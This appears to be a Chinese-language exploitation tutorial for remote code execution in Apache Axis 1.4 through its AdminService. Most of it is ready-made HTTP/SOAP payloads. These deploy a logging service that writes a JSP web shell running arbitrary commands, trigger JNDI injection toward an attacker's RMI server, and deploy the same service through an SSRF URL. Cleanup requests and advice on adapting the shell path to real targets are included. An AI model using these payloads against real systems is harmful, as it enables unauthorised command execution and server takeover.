axis服务被用于部署各种接口服务,而其中有个一个AdminService接口允许管理员远程访问管理服务,相关配置在/axis/WEB-INF/server-config.wsdd(部署应用后产生),其中enableRemoteAdmin默认为false,只允许本地管理

1
2
3
4
5
6
<service name="AdminService" provider="java:MSG">
 <parameter name="allowedMethods" value="AdminService"/>
 <parameter name="enableRemoteAdmin" value="false"/>
 <parameter name="className" value="org.apache.axis.utils.Admin"/>
 <namespace>http://xml.apache.org/axis/wsdd/</namespace>
</service>

这种情况需要利用SSRF或者中间人攻击,先看看开启远程管理时的利用方式

写文件getshell

部署RandomService,并指定日志目录为shell路径

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
POST /axis/services/AdminService HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 1059
Host: 192.168.33.128:8080
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <ns1:deployment
  xmlns="http://xml.apache.org/axis/wsdd/"
  xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
  xmlns:ns1="http://xml.apache.org/axis/wsdd/">
  <ns1:service name="RandomService" provider="java:RPC">
    <requestFlow>
      <handler type="RandomLog"/>
    </requestFlow>
    <ns1:parameter name="className" value="java.util.Random"/>
    <ns1:parameter name="allowedMethods" value="*"/>
  </ns1:service>
  <handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler" >
    <parameter name="LogHandler.fileName" value="../webapps/axis/shell.jsp" />   
    <parameter name="LogHandler.writeToConsole" value="false" /> 
  </handler>
</ns1:deployment>
  </soapenv:Body>
</soapenv:Envelope>


请求RandomService,利用报错将错误日志写入到shell文件当中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
POST /axis/services/RandomService HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 874
Host: 192.168.33.128:8080
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Body>
        <api:main
        soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
            <api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
            </api:in0>
        </api:main>
  </soapenv:Body>
</soapenv:Envelope>


访问shell地址view-source:http://192.168.33.128:8080/axis/shell.jsp?c=ifconfig

注意:部署服务时指定的shell写入路径LogHandler.fileName../webapps/axis/shell.jsp,是因为我本地启动tomcat时是在tomcat/bin下启动的,但实际遇到的目标启动路径可能不同,需要根据实际对写入的路径做相应的变动

JNDI注入

某大佬发现axis自带的类org.apache.axis.client.ServiceFactory中有一个getService(方法会造成JNDI注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /axis/services/AdminService HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 746
Host: 127.0.0.1:8080
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:api="http://127.0.0.1/Integrics/Enswitch/API" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soapenv:Body>
    <ns1:deployment xmlns:ns1="http://xml.apache.org/axis/wsdd/" xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
      <ns1:service name="jndiService" provider="java:RPC">
        <ns1:parameter name="className" value="org.apache.axis.client.ServiceFactory"/>
        <ns1:parameter name="allowedMethods" value="*"/>
      </ns1:service>
    </ns1:deployment>
  </soapenv:Body>
</soapenv:Envelope>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /axis/services/jndiService HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 874
Host: 127.0.0.1:8080
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:buil="http://build.antlr">
  <soapenv:Header/>
  <soapenv:Body>
    <buil:getService soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <environment xmlns:apachesoap="http://xml.apache.org/xml-soap" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xsi:type="apachesoap:Map">
        <item>
          <key xsi:type="soapenc:string">jndiName</key>
          <value xsi:type="soapenc:string">rmi://ip:port/exp</value>
        </item>
      </environment>
    </buil:getService>
  </soapenv:Body>
</soapenv:Envelope>

SSRF和中间人攻击

SSRF方式部署服务:

1
http://127.0.0.1:8080/axis/services/AdminService?method=!--><ns1:deployment+xmlns="http://xml.apache.org/axis/wsdd/"+xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"+xmlns:ns1="http://xml.apache.org/axis/wsdd/"><ns1:service+name="RandomService"+provider="java:RPC"><requestFlow><handler+type="RandomLog"/></requestFlow><ns1:parameter+name="className"+value="java.util.Random"/><ns1:parameter+name="allowedMethods"+value="*"/></ns1:service><handler+name="RandomLog"+type="java:org.apache.axis.handlers.LogHandler"><parameter+name="LogHandler.fileName"+value="../webapps/axis/shell.jsp"/><parameter+name="LogHandler.writeToConsole"+value="false"/></handler></ns1:deployment

中间人攻击原理(CVE-2019-0227):

清理

1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="utf-8"?>
  <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <undeployment xmlns="http://xml.apache.org/axis/wsdd/">
      <service name="randomService"/>
      <handler name="RandomLog"/>
      <service name="jndiService"/>
    </undeployment>
  </soapenv:Body>
</soapenv:Envelope>

Reference

http://mirror.navercorp.com/apache/axis/axis/java/1.4/
http://axis.apache.org/axis/java/apiDocs/org/apache/axis/management/ServiceAdmin.html
http://www.lmxspace.com/2019/07/20/Axis-Rce%E5%88%86%E6%9E%90/
https://jianfensec.com/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/axis%201.4%20AdminService%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%20jndi%E6%B3%A8%E5%85%A5%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%A9%E7%94%A8/
https://xz.aliyun.com/t/4768
https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-0227